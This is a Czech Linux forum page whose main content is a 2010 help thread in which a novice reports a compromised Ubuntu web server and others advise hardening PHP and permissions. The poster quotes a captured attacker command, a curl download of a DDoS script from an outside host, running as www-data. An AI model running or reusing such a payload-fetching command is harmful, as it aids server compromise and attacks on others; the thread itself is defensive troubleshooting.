abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

    dnes 14:11 | Nová verze

    Byla vydána nová verze 9.5 sady aplikací pro SSH komunikaci OpenSSH. Nově ve výchozím stavu ssh-keygen generuje Ed25519 klíče. Do ssh byla přidána možnost obfuskace časováním stisknutí kláves (keystroke timing obfuscation).

    Ladislav Hagara | Komentářů: 0
    dnes 11:44 | Komunita

    Konference OpenAlt 2023 proběhne o víkendu 11. a 12. listopadu v Brně. Přihlásit přednášky lze do neděle 08. října 23:59.

    Ladislav Hagara | Komentářů: 0
    dnes 09:00 | Bezpečnostní upozornění

    V X.Org v libX11 do 1.8.7 a libXpm do 3.5.17 bylo nalezeno a v upstreamu opraveno 5 bezpečnostních chyb (CVE-2023-43785, CVE-2023-43786, CVE-2023-43787, CVE-2023-43788 a CVE-2023-43789). Dvě nejstarší jsou s námi 35 let. Obsaženy byly již v X11R2 vydaném v únoru 1988.

    Ladislav Hagara | Komentářů: 4
    dnes 08:00 | Bezpečnostní upozornění

    Byly publikovány informace o bezpečnostní chybě Looney Tunables aneb CVE-2023-4911 v glibc ld.so. Útočník ji může využít k lokální eskalaci práv. Vyzkoušeno na výchozích instalacích linuxových distribucí Fedora 37 a 38, Ubuntu 22.04 a 23.04 a Debian 12 a 13. Chyba byla do glibc zavlečena v dubnu 2021. Detaily v txt.

    Ladislav Hagara | Komentářů: 0
    včera 20:33 | Komunita

    Na Kickstarteru byla spuštěna crowdfundingová kampaň na podporu telefonu Murena 2 s /e/OS. Telefon má 2 hardwarové přepínače. Prvním lze jednoduše vypnout kamery a mikrofony. Druhým se lze odpojit od sítí.

    Ladislav Hagara | Komentářů: 2
    včera 20:11 | Bezpečnostní upozornění

    Společnost Qualcomm publikovala říjnový bezpečnostní bulletin. V úvodu informuje, že bezpečnostní chyby CVE-2023-33106, CVE-2023-33107, CVE-2022-22071 a CVE-2023-33063 jsou cíleně využívány útočníky. O CVE-2022-22071 se píše už v loňském květnovém bulletinu. Detaily o zbylých chybách jsou k dispozici OEM partnerům. Veřejně budou k dispozici až s vydáním prosincového bulletinu.

    Ladislav Hagara | Komentářů: 0
    včera 13:55 | Nová verze

    Byla vydána nová verze 5.18 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Tor Browser byl povýšen na verzi 12.5.6. Tor na verzi 0.4.8.6.

    Ladislav Hagara | Komentářů: 0
    včera 10:55 | Nová verze

    Šifrovací nástroj VeraCrypt v menším vydání 1.26.7 nejen opravuje chyby a aktualizuje podporované algoritmy (podrobnosti v poznámkách vydání), ale také přestává podporovat původní svazky TrueCrypt.

    Fluttershy, yay! | Komentářů: 0
    včera 09:00 | Pozvánky

    V sobotu 7. října proběhne Maker Faire Liberec, festival plný workshopů, interaktivních činností a především nadšených a zvídavých lidí.

    Ladislav Hagara | Komentářů: 0
    včera 08:00 | Zajímavý článek Ladislav Hagara | Komentářů: 0
    Raději
     (56%)
     (44%)
    Celkem 63 hlasů
     Komentářů: 3, poslední 2.10. 23:31
    Rozcestník

    Dotaz: DDOS?? (urgent)

    10.8.2010 01:31 Martin
    DDOS?? (urgent)
    Přečteno: 456×
    Čus chlapi. Jsem začátečník a mám vlastní webserver s ubuntu 9.10. Ted se mi však často stává že se systém přetíží natolik že se nezapne ani LCD. Občas se mi povede chytnout dobrou chvilku a vidim tam ty žrouty: (výpis z webmina) ID USER CPU PŘÍKAZ 9422 www-data 46.3 % /sbin/syslogd 9429 www-data 27.8 % /sbin/klogd -c 1 -x -x 9427 www-data 26.0 % /sbin/syslogd

    No a právě teď jsem tam na chvíli zachytl proces pod tímto příkazem: curl -O http://www.salsayson.com/logs/ddos.txt -O ddos.txt

    Spuštěné to bylo pod www-data. Můžete mi pomoci? Jakou ochranu nasadit na server? Už tam mám firewall, nastavený dokonce i s dhcp. Ale přesto to přes něj projde :( Opravdu jsem ještě neznalý...

    Díky moc

    Odpovědi

    Jendа avatar 10.8.2010 02:31 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Máš tam záškodníka. Ale běží pod www-data, tzn. asi se mu nepodařilo získat roota (to bys ho třeba ani neviděl). Tipnul bych si, že hostuješ nějakou děravou PHP aplikaci, která umožňuje cizím lidem spouštět externí programy (v tomto případě v Perlu).
    Domov chce do BRICS! :D | Tohle vyhrálo na tzv. Slovensku 🤗
    10.8.2010 04:14 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    běží tam wordpress, e107, phpbb, oxid eshop. Web s e107 již potíže byli. Dokonce jsem musel několikrát nahrazovat celý root adresář. Na serveru mi také občas mizí obrázky (ze všech cms). Většinou to bývají loga.
    10.8.2010 08:57 NN
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Mam napad pokud jiz nemas "suhosin" pro PHP..

    NN
    10.8.2010 09:10 none
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Pomerne bezna situace. Je potreba zjistit jakou dirou se tam dostava. Nic sloziteho to nebude, nejspis neco v php (obligatni 'include $file' apod. Hledej v logach souvisejicich s tim zaznamem co jsi posilal (podle ip adresy, nazvu souboru apod.). Pokud ten proces bezi, najdes ho v /proc a uvidis i odkud byl spusten. A kdyz uz vis jak to funguje, tak musis vhodne nastavit apache/php/system tak, aby k tomu nemohlo dojit. Opravovat skript php, ktery je takhle deravy je neproduktivni, protoze jich bude pravdepodobne deravych vic a je jen otazkou casu, kdy se to bude opakovat. Nadruhou stranu nechat tam tu diru je taky hrich. Takze jednak opravit php skripty a jednak nakonfiguraovat prostredi tak, aby k tomu nemohlo dochazet. V php zakazat vsechny potencialne nebezpecne funkce (exec, system etc.), kazdemu hostingu dat jineho uzivatele s prislusnymi pravy a tak dale. Neni to jednoduche a neni to neprustrelne, bohuzel. Ale drtivou vetsinu tech utoku eliminujes. Prinejmensim tech robotickych.

    Jojo, provozovat LAMP/LAPP (a vubec jakykoliv) server neni pro kazdeho, je treba neco umet a znat system ktery pouzivas. Pockej az prijdou ucty za datovy prenos, stiznosti na spam na utoky apod. Vyplati se tomu rozumnet nebo to nechat odbornikum ;). Za par stovek ti ten server muze nekdo spravovat a mas klid.
    10.8.2010 12:18 Šangala | skóre: 56 | blog: Dutá Vrba - Wally
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Většina byla již popsána, jen doplním, že před přetížením Vás mohou zachránit limity s vhodným nastavením. Potom se aspoň na ten server pravděpodobně lehce dostanete a může analyzovat a napravovat…
    To, že trpíš stihomamem, ještě neznamená, že po tobě nejdou. ⰞⰏⰉⰓⰀⰜⰉ ⰗⰞⰅⰜⰘ ⰈⰅⰏⰉ ⰒⰑⰎⰉⰁⰕⰅ ⰏⰉ ⰒⰓⰄⰅⰎ ·:⁖⁘⁙†
    11.8.2010 07:50 Martin
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    Takže mam v ubuntu vytvořit klasickýho uživatele a pak tomu uživateli přidělit root adresář webu? V tý e107 jsem dělal nějaké úpravy, takže sem možná někde nechal chmod 777. To bude určitě ono že? :) Systému ještě moc nerozumim, hlavně struktuře souborů, oprávnění a jejich smysl :D
    11.8.2010 10:29 alkoholik | skóre: 40 | blog: Alkoholik
    Rozbalit Rozbalit vše Re: DDOS?? (urgent)
    A co si o tom alespon neco malo precist?

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.